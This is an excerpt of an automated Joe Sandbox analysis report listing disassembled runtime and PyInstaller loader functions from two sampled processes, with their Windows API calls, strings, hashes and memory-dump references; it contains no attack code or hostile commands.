Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: c7cf80b64c2c996719d676bafa3a3227ef86ebbdfd2f94fad47f8572ff50c90b
Instruction ID: cf8a42a963ef2241a74c269abbda7c2055dc543779d030fb002c274e2d5efb23
Opcode Fuzzy Hash: c7cf80b64c2c996719d676bafa3a3227ef86ebbdfd2f94fad47f8572ff50c90b
Instruction Fuzzy Hash: 5A1105B2904714ABC710DF68D802F96F7D8EF44320F14852AF958A7281FB71E9558BB0

Function 00E145BE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00E1456F,00000000,?,00E380E8,?,?,?,00E14712,00000004,InitializeCriticalSectionEx,00E27058,00E27060), ref: 00E145CB
GetLastError.KERNEL32(?,00E1456F,00000000,?,00E380E8,?,?,?,00E14712,00000004,InitializeCriticalSectionEx,00E27058,00E27060,00000000,?,00E144C9), ref: 00E145D5
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00E145FD

Strings

api-ms-, xrefs: 00E145E2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: ea619c4ae4cb3c7ceb94c01c27d22d814586f2f44b523e3a30470b0b9b2f0c88
Instruction ID: 500c667b704a7402de6b7e9b3bd6b664190b54055fd188070d2306d24109583f
Opcode Fuzzy Hash: ea619c4ae4cb3c7ceb94c01c27d22d814586f2f44b523e3a30470b0b9b2f0c88
Instruction Fuzzy Hash: 3AE04870644204FBEB211B61EC0AF5C3B559B11B4DF145021FD4CF41E1E7B1D9559944

Function 00DFFC16 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(AA85FA48,00000000,00000000,?), ref: 00DFFC79

Part of subcall function 00E049B8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00E039BB,?,00000000,-00000008), ref: 00E04A64

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DFFED4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DFFF1C
GetLastError.KERNEL32 ref: 00DFFFBF

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: e0322f89241595ee045f96ae656aa87953c6cb4ebcaa56de425780ac92ec8c2b
Instruction ID: 1d306e7ed83080a24619d9d97210eaf98795985758a66bf385e6ffa8fd32383e
Opcode Fuzzy Hash: e0322f89241595ee045f96ae656aa87953c6cb4ebcaa56de425780ac92ec8c2b
Instruction Fuzzy Hash: 96D169B5D0025C9FCB15CFA8D8809EDBBB5FF09310F19852AE956EB351D730A946CB60

Function 00E1368F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E13756
___AdjustPointer.LIBCMT ref: 00E13779
___AdjustPointer.LIBCMT ref: 00E13815

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b1bab9b1a28f4a597f308aff443a9bab7eb70a768098536e1f047cdf3e97a8c0
Instruction ID: ed8cbf9216781da20f5c8d779a013efe224cfa0a5bb9dda274f0f64afbacdb3c
Opcode Fuzzy Hash: b1bab9b1a28f4a597f308aff443a9bab7eb70a768098536e1f047cdf3e97a8c0
Instruction Fuzzy Hash: A051D3F5605206AFEB298F20D881BFBB7A4EF04714F24552AE955672D1E731EEC0C790

Function 00DFC818 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cacba2adb41585f3a109ef8e3c76ae3553e6807131f4d72f8a8e12a78a061faa
Instruction ID: 8eee51622d441f59c04af5707c3e97f4e2ff1b452e2f8862a57d0da16089d6fc
Opcode Fuzzy Hash: cacba2adb41585f3a109ef8e3c76ae3553e6807131f4d72f8a8e12a78a061faa
Instruction Fuzzy Hash: 3321CF71A2020DAFEB20AF61DE41D3A77A8EF443A4706D925FB1597551E771EC208BB0

Function 00E1491F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,AA85FA48,00000000,00000000,00000000,00000000,00000000,?,?,?,00DD258F,?,?,00000000,00000000), ref: 00E1493C
GetLastError.KERNEL32(?,?,?,00DD258F,?,?,00000000,00000000,00000000,AA85FA48,?,?), ref: 00E14948
WideCharToMultiByte.KERNEL32(?,00000000,AA85FA48,00000000,00000000,00000000,00000000,00000000,?,?,?,00DD258F,?,?,00000000,00000000), ref: 00E1496E
GetLastError.KERNEL32(?,?,?,00DD258F,?,?,00000000,00000000,00000000,AA85FA48,?,?), ref: 00E1497A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 6d9ee094b89be8abf0db25dcdddd50190effbb4287dace3a0a54460510d06bc5
Instruction ID: 3b6d66d425a80c3564faf0e72524e47653fab09424591cc71ad9bb63ad2d55a5
Opcode Fuzzy Hash: 6d9ee094b89be8abf0db25dcdddd50190effbb4287dace3a0a54460510d06bc5
Instruction Fuzzy Hash: 4701FF7260005BBB9F224F969C08D9B7E3AEBD97A0B108525FE1565260C6318C62EBB0

Function 00E0CFB6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00E15542,00DF8594,00000000,00000000,?,00E0A821,00000000,00000001,00000000,?,?,00E00013,?,00000000,00000000), ref: 00E0CFCD
GetLastError.KERNEL32(?,00E0A821,00000000,00000001,00000000,?,?,00E00013,?,00000000,00000000,?,?,?,00E005D1,?), ref: 00E0CFD9

Part of subcall function 00E0CF9D: CloseHandle.KERNEL32(FFFFFFFE,00E0CFE9,?,00E0A821,00000000,00000001,00000000,?,?,00E00013,?,00000000,00000000,?,?), ref: 00E0CFAD

___initconout.LIBCMT ref: 00E0CFE9

Part of subcall function 00E0CF5F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E0CF8E,00E0A80E,?,?,00E00013,?,00000000,00000000,?), ref: 00E0CF72

WriteConsoleW.KERNEL32(00000000,00E15542,00DF8594,00000000,?,00E0A821,00000000,00000001,00000000,?,?,00E00013,?,00000000,00000000,?), ref: 00E0CFFE

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 40bf5df21951b5ac487ce510b375523c546c395534960d6b2ca47b23ea1cf6ab
Instruction ID: beb0d510f607bf11d89646621b02dbf7c06620b3c830494422e4f8bc2442d713
Opcode Fuzzy Hash: 40bf5df21951b5ac487ce510b375523c546c395534960d6b2ca47b23ea1cf6ab
Instruction Fuzzy Hash: 41F0153610011DBFCF222FE2EC09A8A3F67FB083A0F108150FA1CB51B1D6328965DBA1

Function 00E074D7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 357COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00E075DF

Strings

h&, xrefs: 00E07914
$, xrefs: 00E0790A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Info
String ID: h&$$
API String ID: 1807457897-250582099
Opcode ID: 7d6fa0e29dc6fff7d986b5ab1388411cfd72014d65eb748611addfe178ac66dd
Instruction ID: 92bd7f0718c0d3bee26b17f417b77353c74ead7d3fe4405d65dc2508d5b0745a
Opcode Fuzzy Hash: 7d6fa0e29dc6fff7d986b5ab1388411cfd72014d65eb748611addfe178ac66dd
Instruction Fuzzy Hash: 26D1AC71D042059FDB11DFA8C881BEEBBF9FF09304F18512AE495B7282D775A985CB60

Function 00DF8F48 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00DF90BF

Strings

+, xrefs: 00DF901D
-, xrefs: 00DF9010

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: ceac1a7daeb4eb626a03da4197fdbc32bf6379300fc954f3ef5b435758e7e393
Instruction ID: 82ca993bad7b4ecdcb4cc109ef5fa06686e907dc9443cc30f5158f1e4cfa448f
Opcode Fuzzy Hash: ceac1a7daeb4eb626a03da4197fdbc32bf6379300fc954f3ef5b435758e7e393
Instruction Fuzzy Hash: 72A1D430D4425DAECF24CE78C8647FEBBA1EF46324F1AC565E9A59B281C630DA458B70

Function 00DC8630 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00DC8871
___std_exception_destroy.LIBVCRUNTIME ref: 00DC8880

Strings

[json.exception., xrefs: 00DC875A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 0c428a13234e8201617196ea80f584652e1d4faa52e237c85c999c80eb9694ad
Instruction ID: c4e9adaaa25a0ff19ec073cc4e23802c4d685395ac4bbbd91c97318fd1dd419d
Opcode Fuzzy Hash: 0c428a13234e8201617196ea80f584652e1d4faa52e237c85c999c80eb9694ad
Instruction Fuzzy Hash: 1071E770A002059BDB08CF58D885F9ABBF5FF84300F14452DE805AB7C2EBB4A995DBA1

Function 00DD92E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00DD946F

Part of subcall function 00E134A6: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00E14DCB,?,00E33F20,?,?,?), ref: 00E13506

Strings

ios_base::failbit set, xrefs: 00DD9308
ios_base::badbit set, xrefs: 00DD9407, 00DD9432, 00DD9453

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 211fddf801f3203cc50146d441884b5ff53a749d668188979f0056b933053e93
Instruction ID: 44aee02553007bfa1840adb6cd6c3ffa9028ba30ba390c2f8a0a61330310a1f0
Opcode Fuzzy Hash: 211fddf801f3203cc50146d441884b5ff53a749d668188979f0056b933053e93
Instruction Fuzzy Hash: DA51F671914208ABC704DF68CC45BAEFBF8EF49310F14822AF955A7781E771A945CBB1

Function 00E02996 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E029E6
ReadFile.KERNEL32(?,?,00001000,?,00000000,00E0272F,00000001,00000000,00DDA3A0,00000000,?,?,00000000,?,?,00E02BB2), ref: 00E02A6C

Strings

/', xrefs: 00E029AF

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: /'
API String ID: 1834446548-3429184148
Opcode ID: 4d57f91d652158b1a68b6580382a0d413ace28eaafccc335d676c87f7454c309
Instruction ID: 3b552cdb678d57c431537c2d1de830aaca3083da0dd8429dcce508fbead00f6a
Opcode Fuzzy Hash: 4d57f91d652158b1a68b6580382a0d413ace28eaafccc335d676c87f7454c309
Instruction Fuzzy Hash: 5141E071A00258ABCB36CF28CC85BE9B7F5EB48304F5091A9EA89B6181D775DEC58F50

Analysis Process: lib.exePID: 6600, Parent PID: 5572COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	70

Executed Functions

Function 00007FF759974EA0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF759974EE5

Part of subcall function 00007FF759974838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75997484C

Part of subcall function 00007FF759969F78: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F8E
Part of subcall function 00007FF759969F78: GetLastError.KERNEL32(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F98

Part of subcall function 00007FF759969F30: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF759969F0F,?,?,?,?,?,00007FF759961A40), ref: 00007FF759969F39
Part of subcall function 00007FF759969F30: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF759969F0F,?,?,?,?,?,00007FF759961A40), ref: 00007FF759969F5E

_get_daylight.LIBCMT ref: 00007FF759974ED4

Part of subcall function 00007FF759974898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7599748AC

_get_daylight.LIBCMT ref: 00007FF75997514A
_get_daylight.LIBCMT ref: 00007FF75997515B
_get_daylight.LIBCMT ref: 00007FF75997516C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7599753AC), ref: 00007FF759975193

Strings

Eastern Summer Time, xrefs: 00007FF759975251
Eastern Standard Time, xrefs: 00007FF759975239

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3714727158-239921721
Opcode ID: aa85b069b6fb92bd10a5b6d5be9144cf64bbc0ff06c8fbb0fdd7caf4b6a87e0b
Instruction ID: 6bc84ef92ad5c217dc5fdb3a69a0f2c6a7b7d43f64f89a599a6eecbcb828eae8
Opcode Fuzzy Hash: aa85b069b6fb92bd10a5b6d5be9144cf64bbc0ff06c8fbb0fdd7caf4b6a87e0b
Instruction Fuzzy Hash: DCD1C066E1824286EB60BF25D8811B9E371FFC6784FC89136EA0D47696DF3CE441C7A0

Function 00007FF7599558E0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,00000000,?,00007FF7599558AD), ref: 00007FF75995597A
GetCurrentProcessId.KERNEL32(?,00007FF7599558AD), ref: 00007FF759955980

Part of subcall function 00007FF759955AF0: GetEnvironmentVariableW.KERNEL32(00007FF759952817,?,?,?,?,?,?), ref: 00007FF759955B2A
Part of subcall function 00007FF759955AF0: ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?), ref: 00007FF759955B47

Part of subcall function 00007FF759966818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759966831

SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF759955A31

Strings

TMP, xrefs: 00007FF759955918, 00007FF7599559D9, 00007FF759955A67
_MEI%d, xrefs: 00007FF759955988
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF759955958
TMP, xrefs: 00007FF75995593E

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Environment$Variable$CurrentExpandPathProcessStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 1556224225-1116378104
Opcode ID: c805534fc36cce2f638f5d4b2e31efb0a3bdcbd638384fcea02245f06552b5c8
Instruction ID: 93277449ee78579f757eb180dca41a26a7c993466d0237072a5309200c12a8f5
Opcode Fuzzy Hash: c805534fc36cce2f638f5d4b2e31efb0a3bdcbd638384fcea02245f06552b5c8
Instruction Fuzzy Hash: F3518D50B0D68351FA55BF62A9552BAD2A1AFD6BC0FCD4035EC0E8B797EF2CE4018720

Function 00007FF759975DEC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975B61
Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975BDF
Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975C30

CreateFileW.KERNELBASE ref: 00007FF759975EF2
CreateFileW.KERNEL32 ref: 00007FF759975F42
GetLastError.KERNEL32 ref: 00007FF759975F72
GetFileType.KERNELBASE ref: 00007FF759975F87
GetLastError.KERNEL32 ref: 00007FF759975F91
CloseHandle.KERNEL32 ref: 00007FF759975FC4
CloseHandle.KERNEL32 ref: 00007FF759976127
CreateFileW.KERNEL32 ref: 00007FF75997615C
GetLastError.KERNEL32 ref: 00007FF75997616B

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 52a4378cdb78c32285671ba8c66096e739a338fe2dbd84037285ee5c330aca07
Instruction ID: 33bf0895a9f886bd93a0cd8c299c3f1e286768b4eaffff7a83aa6c252b17aafe
Opcode Fuzzy Hash: 52a4378cdb78c32285671ba8c66096e739a338fe2dbd84037285ee5c330aca07
Instruction Fuzzy Hash: AFC1E332B28A8285EB50EF65C4902AC7771FB8AB98F890235DE1E577D5DF38D055C350

Function 00007FF75997511C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF75997514A

Part of subcall function 00007FF759974898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7599748AC

_get_daylight.LIBCMT ref: 00007FF75997515B

Part of subcall function 00007FF759974838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75997484C

_get_daylight.LIBCMT ref: 00007FF75997516C

Part of subcall function 00007FF759974868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75997487C

Part of subcall function 00007FF759969F78: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F8E
Part of subcall function 00007FF759969F78: GetLastError.KERNEL32(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F98

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7599753AC), ref: 00007FF759975193

Strings

Eastern Summer Time, xrefs: 00007FF759975251
Eastern Standard Time, xrefs: 00007FF759975239

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1511944507-239921721
Opcode ID: 745ef94ea7204a2bfbd30c29007a49fe20bc82f24fe0203fc347e73c8b1ad169
Instruction ID: da4961104e48f1d005884e9730631a9bddfc89e3a749da56084752915fd9807a
Opcode Fuzzy Hash: 745ef94ea7204a2bfbd30c29007a49fe20bc82f24fe0203fc347e73c8b1ad169
Instruction Fuzzy Hash: 67519C72A1864286F750FF21E9811B9E375BFC9784FC8513AEA0D87696DF3CE44087A0

Function 00007FF75996FA88 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

